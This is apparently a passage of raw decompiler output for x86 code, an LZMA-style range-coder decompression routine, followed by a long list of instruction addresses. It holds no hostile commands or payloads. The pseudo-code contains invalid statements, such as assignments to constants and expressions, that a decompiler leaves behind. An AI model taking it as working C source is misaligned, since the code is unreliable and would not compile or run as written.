								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                          0x00000000
                          0x0040667f
                          0x0040667f
                          0x00406683
                          0x0040673a
                          0x0040673d
                          0x00406749
                          0x0040662a
                          0x0040662a
                          0x0040662d
                          0x0040699f
                          0x0040699f
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069ee
                          0x00406a15
                          0x00406a15
                          0x00406a1b
                          0x00406a1b
                          0x00000000
                          0x004069f0
                          0x004069f0
                          0x004069f4
                          0x00406ba3
                          0x00000000
                          0x00406ba3
                          0x00406a00
                          0x00406a07
                          0x00406a0f
                          0x00406a12
                          0x00000000
                          0x00406a12
                          0x00406689
                          0x0040668d
                          0x00406bce
                          0x00406bce
                          0x00406bd1
                          0x00406bd5
                          0x00406bd5
                          0x00406693
                          0x00406699
                          0x0040669c
                          0x004066a0
                          0x004066a3
                          0x004066a7
                          0x00406b6d
                          0x00406bb9
                          0x00406bc1
                          0x00406bc8
                          0x00406bca
                          0x00000000
                          0x00406bca
                          0x004066ad
                          0x004066b0
                          0x004066b6
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066be
                          0x004066c1
                          0x004066c4
                          0x004066c7
                          0x004066ca
                          0x004066cb
                          0x004066cd
                          0x004066cd
                          0x004066cd
                          0x004066d0
                          0x004066d3
                          0x004066d6
                          0x004066d9
                          0x004066d9
                          0x004066dc
                          0x004066de
                          0x004066de
                          0x004066e1
                          0x004066e1
                          0x004066e1
                          0x004061b7
                          0x004061b7
                          0x004061c0
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00000000
                          0x004061d1
                          0x00000000
                          0x00000000
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e4
                          0x00000000
                          0x00000000
                          0x004061ea
                          0x004061ed
                          0x004061ef
                          0x004061f0
                          0x004061f3
                          0x004061f5
                          0x004061f6
                          0x004061f8
                          0x004061fb
                          0x00406200
                          0x00406205
                          0x0040620e
                          0x00406221
                          0x00406224
                          0x00406230
                          0x00406258
                          0x0040625a
                          0x00406268
                          0x00406268
                          0x0040626c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040625c
                          0x0040625c
                          0x0040625f
                          0x00406260
                          0x00406260
                          0x00000000
                          0x0040625c
                          0x00406236
                          0x0040623b
                          0x0040623b
                          0x00406244
                          0x0040624c
                          0x0040624f
                          0x00000000
                          0x00406255
                          0x00406255
                          0x00000000
                          0x00406255
                          0x00000000
                          0x00406272
                          0x00406272
                          0x00406276
                          0x00406b22
                          0x00000000
                          0x00406b22
                          0x0040627f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406295
                          0x00406295
                          0x00406298
                          0x0040629c
                          0x00000000
                          0x00000000
                          0x0040629e
                          0x004062a4
                          0x004062ce
                          0x004062d4
                          0x004062db
                          0x00000000
                          0x004062db
                          0x004062aa
                          0x004062ad
                          0x004062b2
                          0x004062b2
                          0x004062bd
                          0x004062c5
                          0x004062c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040630d
                          0x00406313
                          0x00406316
                          0x00406323
                          0x0040632b
                          0x00000000
                          0x00000000
                          0x004062e2
                          0x004062e2
                          0x004062e6
                          0x00406b31
                          0x00000000
                          0x00406b31
                          0x004062f2
                          0x004062fd
                          0x004062fd
                          0x004062fd
                          0x00406300
                          0x00406303
                          0x00406306
                          0x0040630b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406333
                          0x00406335
                          0x00406338
                          0x004063a9
                          0x004063ac
                          0x004063af
                          0x004063b6
                          0x004063c0
                          0x00000000
                          0x004063c0
                          0x0040633a
                          0x0040633e
                          0x00406341
                          0x00406343
                          0x00406346
                          0x00406349
                          0x0040634b
                          0x0040634e
                          0x00406350
                          0x00406355
                          0x00406358
                          0x0040635b
                          0x0040635f
                          0x00406366
                          0x00406369
                          0x00406370
                          0x00406374
                          0x0040637c
                          0x0040637c
                          0x0040637c
                          0x00406376
                          0x00406376
                          0x00406376
                          0x0040636b
                          0x0040636b
                          0x0040636b
                          0x00406380
                          0x00406383
                          0x004063a1
                          0x004063a3
                          0x00000000
                          0x00406385
                          0x00406385
                          0x00406388
                          0x0040638b
                          0x0040638e
                          0x00406390
                          0x00406390
                          0x00406390
                          0x00406393
                          0x00406396
                          0x00406398
                          0x00406399
                          0x0040639c
                          0x00000000
                          0x0040639c
                          0x00000000
                          0x004065d2
                          0x004065d6
                          0x004065f4
                          0x004065f7
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x00406607
                          0x0040660a
                          0x0040660d
                          0x0040660f
                          0x00406616
                          0x00406617
                          0x00406619
                          0x0040661c
                          0x0040661f
                          0x00406622
                          0x00406622
                          0x00406627
                          0x00000000
                          0x00406627
                          0x004065d8
                          0x004065db
                          0x004065de
                          0x004065e8
                          0x00000000
                          0x00000000
                          0x0040663c
                          0x00406640
                          0x00406663
                          0x00406666
                          0x00406669
                          0x00406673
                          0x00406642
                          0x00406642
                          0x00406645
                          0x00406648
                          0x0040664b
                          0x00406658
                          0x0040665b
                          0x0040665b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066f0
                          0x004066f4
                          0x004066fb
                          0x004066fe
                          0x00406701
                          0x0040670b
                          0x00000000
                          0x0040670b
                          0x004066f6
                          0x00000000
                          0x00000000
                          0x00406717
                          0x0040671b
                          0x00406722
                          0x00406725
                          0x00406728
                          0x0040671d
                          0x0040671d
                          0x0040671d
                          0x0040672b
                          0x0040672e
                          0x00406731
                          0x00406731
                          0x00406734
                          0x00406737
                          0x00000000
                          0x00000000
                          0x004067d7
                          0x004067d7
                          0x004067db
                          0x00406b79
                          0x00000000
                          0x00406b79
                          0x004067e1
                          0x004067e4
                          0x004067e7
                          0x004067eb
                          0x004067ee
                          0x004067f4
                          0x004067f6
                          0x004067f6
                          0x004067f6
                          0x004067f9
                          0x004067fc
                          0x00000000
                          0x00000000
                          0x004063cc
                          0x004063cc
                          0x004063d0
                          0x00406b3d
                          0x00000000
                          0x00406b3d
                          0x004063d6
                          0x004063d9
                          0x004063dc
                          0x004063e0
                          0x004063e3
                          0x004063e9
                          0x004063eb
                          0x004063eb
                          0x004063eb
                          0x004063ee
                          0x004063f1
                          0x004063f1
                          0x004063f4
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x004063fd
                          0x00406403
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406410
                          0x00406413
                          0x00406416
                          0x00406419
                          0x0040641a
                          0x0040641d
                          0x0040641f
                          0x00406425
                          0x00406428
                          0x0040642b
                          0x0040642e
                          0x00406431
                          0x00406434
                          0x00406437
                          0x00406453
                          0x00406456
                          0x00406459
                          0x0040645c
                          0x00406463
                          0x00406467
                          0x00406469
                          0x0040646d
                          0x00406439
                          0x00406439
                          0x0040643d
                          0x00406445
                          0x0040644a
                          0x0040644c
                          0x0040644e
                          0x0040644e
                          0x00406470
                          0x00406477
                          0x0040647a
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406485
                          0x00406485
                          0x00406489
                          0x00406b49
                          0x00000000
                          0x00406b49
                          0x0040648f
                          0x00406492
                          0x00406495
                          0x00406499
                          0x0040649c
